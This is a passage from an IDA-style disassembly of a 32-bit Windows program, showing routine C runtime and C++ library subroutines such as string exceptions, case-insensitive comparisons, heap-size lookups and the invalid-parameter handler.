sub_402630 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402636 proc near ; CODE XREF: sub_41B1A0+C8�p
; sub_41B1A0+1C0�p ...
jmp ds:dword_41D1D0
sub_402636 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40263C proc near ; CODE XREF: sub_41B1A0+1B1�p
jmp ds:dword_41D1CC
sub_40263C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402642 proc near ; CODE XREF: sub_41A9DE+B2�p
jmp ds:dword_41D1C4
sub_402642 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402648 proc near ; CODE XREF: sub_416F86+24�p
; sub_416F86+2F�p ...
jmp sub_40304B
sub_402648 endp
; =============== S U B R O U T I N E =======================================
sub_40264D proc near ; DATA XREF: .rdata:004212A4�o
mov dword ptr [ecx], offset off_41D338
jmp sub_40109A
sub_40264D endp
; =============== S U B R O U T I N E =======================================
sub_402658 proc near ; DATA XREF: .rdata:off_41D338�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D338
call sub_40109A
test [esp+4+arg_0], 1
jz short loc_402674
push esi
call sub_402F6D
pop ecx
loc_402674: ; CODE XREF: sub_402658+13�j
mov eax, esi
pop esi
retn 4
sub_402658 endp
; =============== S U B R O U T I N E =======================================
sub_40267A proc near ; CODE XREF: sub_401337+D�p
push 44h
mov eax, offset loc_41C1D3
call sub_4045CC
push offset aStringTooLong ; "string too long"
lea ecx, [ebp-28h]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push offset dword_421988
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D32C
call sub_4041BB
int 3 ; Trap to Debugger
sub_40267A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4026B9 proc near ; CODE XREF: sub_401141+13�p
; sub_4012AC+F�p
push 44h
mov eax, offset loc_41C1D3
call sub_4045CC
push offset aInvalidStringP ; "invalid string position"
lea ecx, [ebp-28h]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push offset dword_4212A0
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D338
call sub_4041BB
int 3 ; Trap to Debugger
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_4013E6
mov dword ptr [esi], offset off_41D338
mov eax, esi
pop esi
retn 4
sub_4026B9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402710 proc near ; CODE XREF: sub_401C1D+9A�p
; sub_401CC0+1B7�p ...
cmp ecx, dword_423064
jnz short loc_40271A
rep retn
; ---------------------------------------------------------------------------
loc_40271A: ; CODE XREF: sub_402710+6�j
jmp sub_40468E
sub_402710 endp
; =============== S U B R O U T I N E =======================================
sub_40271F proc near ; CODE XREF: sub_4027D6+D�p
; sub_4028F9+1A�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 0
jnz short loc_402791
call sub_40539D
mov [esi+8], eax
mov ecx, [eax+6Ch]
mov [esi], ecx
mov ecx, [eax+68h]
mov [esi+4], ecx
mov ecx, [esi]
cmp ecx, off_423678
jz short loc_40275D
mov ecx, dword_423594
test [eax+70h], ecx
jnz short loc_40275D
call sub_4050B1
mov [esi], eax
loc_40275D: ; CODE XREF: sub_40271F+2A�j
; sub_40271F+35�j
mov eax, [esi+4]
cmp eax, dword_423498
jz short loc_40277E
mov eax, [esi+8]
mov ecx, dword_423594
test [eax+70h], ecx
jnz short loc_40277E
call sub_4049A0
mov [esi+4], eax
loc_40277E: ; CODE XREF: sub_40271F+47�j
; sub_40271F+55�j
mov eax, [esi+8]
test byte ptr [eax+70h], 2
jnz short loc_40279B
or dword ptr [eax+70h], 2
mov byte ptr [esi+0Ch], 1
jmp short loc_40279B
; ---------------------------------------------------------------------------
loc_402791: ; CODE XREF: sub_40271F+D�j
mov ecx, [eax]
mov [esi], ecx
mov eax, [eax+4]
mov [esi+4], eax
loc_40279B: ; CODE XREF: sub_40271F+66�j
; sub_40271F+70�j
mov eax, esi
pop esi
retn 4
sub_40271F endp
; =============== S U B R O U T I N E =======================================
sub_4027A1 proc near ; CODE XREF: sub_4027D6+86�p
; sub_4028A9+39�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
push edi
loc_4027AB: ; CODE XREF: sub_4027A1+2E�j
movzx eax, byte ptr [esi]
lea ecx, [eax-41h]
inc esi
cmp ecx, 19h
ja short loc_4027BA
add eax, 20h
loc_4027BA: ; CODE XREF: sub_4027A1+14�j
movzx ecx, byte ptr [edx]
lea edi, [ecx-41h]
inc edx
cmp edi, 19h
ja short loc_4027C9
add ecx, 20h
loc_4027C9: ; CODE XREF: sub_4027A1+23�j
test eax, eax
jz short loc_4027D1
cmp eax, ecx
jz short loc_4027AB
loc_4027D1: ; CODE XREF: sub_4027A1+2A�j
pop edi
sub eax, ecx
pop esi
retn
sub_4027A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027D6 proc near ; CODE XREF: sub_4028A9+45�p
; sub_40E79A+8F�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push [ebp+arg_8]
lea ecx, [ebp+var_10]
call sub_40271F
xor ebx, ebx
cmp [ebp+arg_0], ebx
jnz short loc_40281D
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402813
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402813: ; CODE XREF: sub_4027D6+34�j
mov eax, 7FFFFFFFh
jmp loc_4028A6
; ---------------------------------------------------------------------------
loc_40281D: ; CODE XREF: sub_4027D6+17�j
push edi
mov edi, [ebp+arg_4]
cmp edi, ebx
jnz short loc_402850
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402849
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402849: ; CODE XREF: sub_4027D6+6A�j
mov eax, 7FFFFFFFh
jmp short loc_4028A5
; ---------------------------------------------------------------------------
loc_402850: ; CODE XREF: sub_4027D6+4D�j
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz short loc_402865
push edi
push [ebp+arg_0]
call sub_4027A1
pop ecx
pop ecx
jmp short loc_402899
; ---------------------------------------------------------------------------
loc_402865: ; CODE XREF: sub_4027D6+80�j
push esi
loc_402866: ; CODE XREF: sub_4027D6+BC�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40565A
inc [ebp+arg_0]
mov esi, eax
movzx eax, byte ptr [edi]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40565A
add esp, 10h
inc edi
cmp esi, ebx
jz short loc_402894
cmp esi, eax
jz short loc_402866
loc_402894: ; CODE XREF: sub_4027D6+B8�j
sub esi, eax
mov eax, esi
pop esi
loc_402899: ; CODE XREF: sub_4027D6+8D�j
cmp [ebp+var_4], bl
jz short loc_4028A5
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_4028A5: ; CODE XREF: sub_4027D6+78�j
; sub_4027D6+C6�j
pop edi
loc_4028A6: ; CODE XREF: sub_4027D6+42�j
pop ebx
leave
retn
sub_4027D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028A9 proc near ; CODE XREF: sub_417676+34�p
; sub_417676+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
xor esi, esi
cmp dword_425DE0, esi
jnz short loc_4028E7
cmp [ebp+arg_0], esi
jnz short loc_4028DB
loc_4028BC: ; CODE XREF: sub_4028A9+35�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
mov eax, 7FFFFFFFh
jmp short loc_4028F6
; ---------------------------------------------------------------------------
loc_4028DB: ; CODE XREF: sub_4028A9+11�j
cmp [ebp+arg_4], esi
jz short loc_4028BC
pop esi
pop ebp
jmp sub_4027A1
; ---------------------------------------------------------------------------
loc_4028E7: ; CODE XREF: sub_4028A9+C�j
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4027D6
add esp, 0Ch
loc_4028F6: ; CODE XREF: sub_4028A9+30�j
pop esi
pop ebp
retn
sub_4028A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028F9 proc near ; CODE XREF: sub_4029E9+51�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
push esi
push edi
jz loc_4029E2
push [ebp+arg_C]
lea ecx, [ebp+var_10]
call sub_40271F
cmp [ebp+arg_0], ebx
jnz short loc_40294B
loc_40291D: ; CODE XREF: sub_4028F9+57�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402941
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402941: ; CODE XREF: sub_4028F9+3F�j
mov eax, 7FFFFFFFh
jmp loc_4029E4
; ---------------------------------------------------------------------------
loc_40294B: ; CODE XREF: sub_4028F9+22�j
mov edi, [ebp+arg_4]
cmp edi, ebx
jz short loc_40291D
mov esi, 7FFFFFFFh
cmp [ebp+arg_8], esi
jbe short loc_402984
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402980
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402980: ; CODE XREF: sub_4028F9+7E�j
mov eax, esi
jmp short loc_4029E4
; ---------------------------------------------------------------------------
loc_402984: ; CODE XREF: sub_4028F9+61�j
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz short loc_4029A9
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_405820
add esp, 0Ch
loc_40299B: ; CODE XREF: sub_4028F9+E7�j
cmp [ebp+var_4], bl
jz short loc_4029E4
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_4029E4
; ---------------------------------------------------------------------------
loc_4029A9: ; CODE XREF: sub_4028F9+91�j
; sub_4028F9+E1�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40565A
inc [ebp+arg_0]
mov esi, eax
movzx eax, byte ptr [edi]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40565A
add esp, 10h
inc edi
dec [ebp+arg_8]
jz short loc_4029DC
cmp esi, ebx
jz short loc_4029DC
cmp esi, eax
jz short loc_4029A9
loc_4029DC: ; CODE XREF: sub_4028F9+D9�j
; sub_4028F9+DD�j
sub esi, eax
mov eax, esi
jmp short loc_40299B
; ---------------------------------------------------------------------------
loc_4029E2: ; CODE XREF: sub_4028F9+E�j
xor eax, eax
loc_4029E4: ; CODE XREF: sub_4028F9+4D�j
; sub_4028F9+89�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4028F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4029E9 proc near ; CODE XREF: sub_419A9F+D3�p
; sub_419C6D+176�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
xor esi, esi
cmp dword_425DE0, esi
jnz short loc_402A30
cmp [ebp+arg_0], esi
jnz short loc_402A1B
loc_4029FC: ; CODE XREF: sub_4029E9+35�j
; sub_4029E9+3E�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
mov eax, 7FFFFFFFh
jmp short loc_402A42
; ---------------------------------------------------------------------------
loc_402A1B: ; CODE XREF: sub_4029E9+11�j
cmp [ebp+arg_4], esi
jz short loc_4029FC
cmp [ebp+arg_8], 7FFFFFFFh
ja short loc_4029FC
pop esi
pop ebp
jmp sub_405820
; ---------------------------------------------------------------------------
loc_402A30: ; CODE XREF: sub_4029E9+C�j
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4028F9
add esp, 10h
loc_402A42: ; CODE XREF: sub_4029E9+30�j
pop esi
pop ebp
retn
sub_4029E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A45 proc near ; CODE XREF: sub_402D09+36�p
; sub_416F86+4C�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_421308
call __SEH_prolog4
xor eax, eax
mov ebx, [ebp+arg_0]
xor edi, edi
cmp ebx, edi
setnz al
cmp eax, edi
jnz short loc_402A7E
call sub_4057D3
mov dword ptr [eax], 16h
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_402AD1
; ---------------------------------------------------------------------------
loc_402A7E: ; CODE XREF: sub_402A45+1A�j
cmp dword_434DF4, 3
jnz short loc_402ABF
push 4
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
push ebx
call sub_405B25
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz short loc_402AAB
mov esi, [ebx-4]
sub esi, 9
mov [ebp+var_1C], esi
jmp short loc_402AAE
; ---------------------------------------------------------------------------
loc_402AAB: ; CODE XREF: sub_402A45+59�j
mov esi, [ebp+var_1C]
loc_402AAE: ; CODE XREF: sub_402A45+64�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_402ADF
cmp [ebp+var_20], edi
jnz short loc_402ACF
loc_402ABF: ; CODE XREF: sub_402A45+40�j
push ebx
push edi
push dword_425F68
call ds:dword_41D190 ; RtlSizeHeap
mov esi, eax
loc_402ACF: ; CODE XREF: sub_402A45+78�j
mov eax, esi
loc_402AD1: ; CODE XREF: sub_402A45+37�j
call __SEH_epilog4
retn
sub_402A45 endp
; =============== S U B R O U T I N E =======================================
sub_402AD7 proc near ; DATA XREF: .rdata:00421320�o
xor edi, edi
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_402AD7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402ADF proc near ; CODE XREF: sub_402A45+70�p
push 4
call sub_40591F
pop ecx
retn
sub_402ADF endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402AE8 proc near ; CODE XREF: sub_419EA0+54�p
jmp ds:dword_41D194
sub_402AE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402AEE proc near ; CODE XREF: sub_40177B+FE�p
; sub_40177B+12F�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_402B19
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_402B98
; ---------------------------------------------------------------------------
loc_402B19: ; CODE XREF: sub_402AEE+C�j
mov ecx, [ebp+arg_4]
cmp ecx, ebx
push esi
mov esi, [ebp+arg_0]
jz short loc_402B45
cmp esi, ebx
jnz short loc_402B45
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_402B97
; ---------------------------------------------------------------------------
loc_402B45: ; CODE XREF: sub_402AEE+34�j
; sub_402AEE+38�j
mov eax, 7FFFFFFFh
cmp ecx, eax
mov [ebp+var_1C], eax
ja short loc_402B54
mov [ebp+var_1C], ecx
loc_402B54: ; CODE XREF: sub_402AEE+61�j
push edi
lea eax, [ebp+arg_C]
push eax
push ebx
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_4069D7
add esp, 10h
cmp esi, ebx
mov edi, eax
jz short loc_402B96
dec [ebp+var_1C]
js short loc_402B88
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_402B94
; ---------------------------------------------------------------------------
loc_402B88: ; CODE XREF: sub_402AEE+91�j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_4067D6
pop ecx
pop ecx
loc_402B94: ; CODE XREF: sub_402AEE+98�j
mov eax, edi
loc_402B96: ; CODE XREF: sub_402AEE+8C�j
pop edi
loc_402B97: ; CODE XREF: sub_402AEE+55�j
pop esi
loc_402B98: ; CODE XREF: sub_402AEE+29�j
pop ebx
leave
retn
sub_402AEE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B9B proc near ; CODE XREF: sub_416F86+15F�p
; sub_416F86+167�p ...
jmp sub_402F6D
sub_402B9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402BA0 proc near ; CODE XREF: sub_40101C+F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
push esi
push edi
xor edi, edi
cmp eax, edi
jz short loc_402BF5
cmp [ebp+arg_0], edi
jnz short loc_402BCE
loc_402BB3: ; CODE XREF: sub_402BA0+31�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_402BBD: ; CODE XREF: sub_402BA0+44�j
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_402BF7
; ---------------------------------------------------------------------------
loc_402BCE: ; CODE XREF: sub_402BA0+11�j
cmp [ebp+arg_8], edi
jz short loc_402BB3
cmp [ebp+arg_4], eax
jnb short loc_402BE6
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_402BBD
; ---------------------------------------------------------------------------
loc_402BE6: ; CODE XREF: sub_402BA0+36�j
push eax
push [ebp+arg_8]
push [ebp+arg_0]
call sub_407370
add esp, 0Ch
loc_402BF5: ; CODE XREF: sub_402BA0+C�j
xor eax, eax
loc_402BF7: ; CODE XREF: sub_402BA0+2C�j
pop edi
pop esi
pop ebp
retn
sub_402BA0 endp
; =============== S U B R O U T I N E =======================================
sub_402BFB proc near ; CODE XREF: sub_401065+11�p
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax+8], 0
mov dword ptr [eax], offset off_41D36C
retn
sub_402BFB endp
; =============== S U B R O U T I N E =======================================
sub_402C0C proc near ; CODE XREF: sub_4015ED+2F�p
; sub_40BA07+15D�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, ecx
mov dword ptr [edi], offset off_41D36C
mov eax, [ebx]
test eax, eax
jz short loc_402C47
push eax
call sub_404130
mov esi, eax
inc esi
push esi
call sub_4036E0
test eax, eax
pop ecx
pop ecx
mov [edi+4], eax
jz short loc_402C4B
push dword ptr [ebx]
push esi
push eax
call sub_4076D5
add esp, 0Ch
jmp short loc_402C4B
; ---------------------------------------------------------------------------
loc_402C47: ; CODE XREF: sub_402C0C+13�j
and dword ptr [edi+4], 0
loc_402C4B: ; CODE XREF: sub_402C0C+2B�j
; sub_402C0C+39�j
mov dword ptr [edi+8], 1
mov eax, edi
pop edi
pop esi
pop ebx
retn 4
sub_402C0C endp
; =============== S U B R O U T I N E =======================================
sub_402C5A proc near ; CODE XREF: sub_403032+A�p
arg_0 = dword ptr 4
mov eax, ecx
mov ecx, [esp+arg_0]
mov dword ptr [eax], offset off_41D36C
mov ecx, [ecx]
and dword ptr [eax+8], 0
mov [eax+4], ecx
retn 8
sub_402C5A endp
; =============== S U B R O U T I N E =======================================
sub_402C72 proc near ; CODE XREF: sub_4013E6+15�p
; sub_4015ED+51�p ...
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D36C
mov eax, [ebx+8]
mov [esi+8], eax
test eax, eax
mov eax, [ebx+4]
push edi
jz short loc_402CBF
test eax, eax
jz short loc_402CB9
push eax
call sub_404130
mov edi, eax
inc edi
push edi
call sub_4036E0
test eax, eax
pop ecx
pop ecx
mov [esi+4], eax
jz short loc_402CC2
push dword ptr [ebx+4]
push edi
push eax
call sub_4076D5
add esp, 0Ch
jmp short loc_402CC2
; ---------------------------------------------------------------------------
loc_402CB9: ; CODE XREF: sub_402C72+1E�j
and dword ptr [esi+4], 0
jmp short loc_402CC2
; ---------------------------------------------------------------------------
loc_402CBF: ; CODE XREF: sub_402C72+1A�j
mov [esi+4], eax
loc_402CC2: ; CODE XREF: sub_402C72+36�j
; sub_402C72+45�j ...
pop edi
mov eax, esi
pop esi
pop ebx
retn 4
sub_402C72 endp
; =============== S U B R O U T I N E =======================================
sub_402CCA proc near ; CODE XREF: sub_401038+6�j
; sub_401043+9�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_41D36C
jz short locret_402CDF
push dword ptr [ecx+4]
call sub_403603
pop ecx
locret_402CDF: ; CODE XREF: sub_402CCA+A�j
retn
sub_402CCA endp
; =============== S U B R O U T I N E =======================================
sub_402CE0 proc near ; DATA XREF: .rdata:0041D318�o
; .rdata:0041D370�o ...
mov eax, [ecx+4]
test eax, eax
jnz short locret_402CEC
mov eax, offset aUnknownExcepti ; "Unknown exception"
locret_402CEC: ; CODE XREF: sub_402CE0+5�j
retn
sub_402CE0 endp
; =============== S U B R O U T I N E =======================================
sub_402CED proc near ; DATA XREF: .rdata:off_41D36C�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_402CCA
test [esp+4+arg_0], 1
jz short loc_402D03
push esi
call sub_402F6D
pop ecx
loc_402D03: ; CODE XREF: sub_402CED+D�j
mov eax, esi
pop esi
retn 4
sub_402CED endp
; =============== S U B R O U T I N E =======================================
sub_402D09 proc near ; CODE XREF: sub_402DE5+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push ebp
push esi
push edi
push dword_434DD0
call sub_405193
push dword_434DCC
mov esi, eax
mov [esp+1Ch+var_4], esi
call sub_405193
mov edi, eax
cmp edi, esi
pop ecx
pop ecx
jb short loc_402DAE
mov ebx, edi
sub ebx, esi
lea ebp, [ebx+4]
cmp ebp, 4
jb short loc_402DAE
push esi
call sub_402A45
mov esi, eax
cmp esi, ebp
pop ecx
jnb short loc_402D95
mov eax, 800h
cmp esi, eax
jnb short loc_402D56
mov eax, esi
loc_402D56: ; CODE XREF: sub_402D09+49�j
add eax, esi
cmp eax, esi
jb short loc_402D6C
push eax
push [esp+18h+var_4]
call sub_4077C2
test eax, eax
pop ecx
pop ecx
jnz short loc_402D83
loc_402D6C: ; CODE XREF: sub_402D09+51�j
lea eax, [esi+10h]
cmp eax, esi
jb short loc_402DAE
push eax
push [esp+18h+var_4]
call sub_4077C2
test eax, eax
pop ecx
pop ecx
jz short loc_402DAE
loc_402D83: ; CODE XREF: sub_402D09+61�j
sar ebx, 2
push eax
lea edi, [eax+ebx*4]
call sub_405127
pop ecx
mov dword_434DD0, eax
loc_402D95: ; CODE XREF: sub_402D09+40�j
mov esi, [esp+14h+arg_0]
mov [edi], esi
add edi, 4
push edi
call sub_405127
mov dword_434DCC, eax
pop ecx
mov eax, esi
jmp short loc_402DB0
; ---------------------------------------------------------------------------
loc_402DAE: ; CODE XREF: sub_402D09+27�j
; sub_402D09+33�j ...
xor eax, eax
loc_402DB0: ; CODE XREF: sub_402D09+A3�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_402D09 endp
; =============== S U B R O U T I N E =======================================
sub_402DB6 proc near ; DATA XREF: .rdata:0041D2C0�o
push esi
push 4
push 20h
call sub_40777A
mov esi, eax
push esi
call sub_405127
add esp, 0Ch
test esi, esi
mov dword_434DD0, eax
mov dword_434DCC, eax
jnz short loc_402DDE
push 18h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402DDE: ; CODE XREF: sub_402DB6+21�j
and dword ptr [esi], 0
xor eax, eax
pop esi
retn
sub_402DB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402DE5 proc near ; CODE XREF: sub_402E21+4�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_421328
call __SEH_prolog4
call sub_4078BC
and [ebp+ms_exc.disabled], 0
push [ebp+arg_0]
call sub_402D09
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_402E1B
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_402DE5 endp
; =============== S U B R O U T I N E =======================================
sub_402E1B proc near ; CODE XREF: sub_402DE5+28�p
; DATA XREF: .rdata:00421340�o
call sub_4078C5
retn
sub_402E1B endp
; =============== S U B R O U T I N E =======================================
sub_402E21 proc near ; CODE XREF: sub_40304B+45�p
; sub_407979+44�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_402DE5
neg eax
sbb eax, eax
neg eax
pop ecx
dec eax
retn
sub_402E21 endp
; =============== S U B R O U T I N E =======================================
sub_402E33 proc near ; CODE XREF: sub_407B19+15�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_425A80, eax
retn
sub_402E33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2A8h
sub_402E3D proc near ; CODE XREF: sub_402F39+1F�j
; sub_405A28+21�p ...
var_328 = dword ptr -328h
var_31C = dword ptr -31Ch
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_244 = word ptr -244h
var_240 = word ptr -240h
var_23C = word ptr -23Ch
var_238 = word ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = word ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = word ptr -208h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2A8h]
sub esp, 328h
mov eax, dword_423064
xor eax, ebp
mov [ebp+2A8h+var_4], eax
push esi
mov [ebp+2A8h+var_220], eax
mov [ebp+2A8h+var_224], ecx
mov [ebp+2A8h+var_228], edx
mov [ebp+2A8h+var_22C], ebx
mov [ebp+2A8h+var_230], esi
mov [ebp+2A8h+var_234], edi
mov [ebp+2A8h+var_208], ss
mov [ebp+2A8h+var_214], cs
mov [ebp+2A8h+var_238], ds
mov [ebp+2A8h+var_23C], es
mov [ebp+2A8h+var_240], fs
mov [ebp+2A8h+var_244], gs
pushf
pop [ebp+2A8h+var_210]
mov esi, [ebp+2ACh]
lea eax, [ebp+2ACh]
mov [ebp+2A8h+var_20C], eax
mov [ebp+2A8h+var_2D0], 10001h
mov [ebp+2A8h+var_218], esi
mov eax, [eax-4]
push 50h
mov [ebp+2A8h+var_21C], eax
lea eax, [ebp+2A8h+var_328]
push 0
push eax
call sub_407B70
lea eax, [ebp+2A8h+var_328]
mov [ebp+2A8h+var_2D8], eax
lea eax, [ebp+2A8h+var_2D0]
add esp, 0Ch
mov [ebp+2A8h+var_328], 0C000000Dh
mov [ebp+2A8h+var_31C], esi
mov [ebp+2A8h+var_2D4], eax
call ds:dword_41D090 ; IsDebuggerPresent
push 0
mov esi, eax
call ds:dword_41D19C ; SetUnhandledExceptionFilter
lea eax, [ebp+2A8h+var_2D8]
push eax
call ds:dword_41D198 ; UnhandledExceptionFilter
test eax, eax
jnz short loc_402F11
test esi, esi
jnz short loc_402F11
push 2
call sub_407B65
pop ecx
loc_402F11: ; CODE XREF: sub_402E3D+C6�j
; sub_402E3D+CA�j
push 0C000000Dh
call ds:dword_41D0CC ; GetCurrentProcess
push eax
call ds:dword_41D0F8 ; TerminateProcess
mov ecx, [ebp+2A8h+var_4]
xor ecx, ebp
pop esi
call sub_402710
add ebp, 2A8h
leave
retn
sub_402E3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F39 proc near ; CODE XREF: sub_4027D6+29�p
; sub_4027D6+5F�p ...
push ebp
mov ebp, esp
push dword_425A80
call sub_405193
test eax, eax
pop ecx
jz short loc_402F4F
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_402F4F: ; CODE XREF: sub_402F39+11�j
push 2
call sub_407B65
pop ecx
pop ebp
jmp sub_402E3D
sub_402F39 endp
; =============== S U B R O U T I N E =======================================
sub_402F5D proc near ; CODE XREF: sub_40164F+5�p
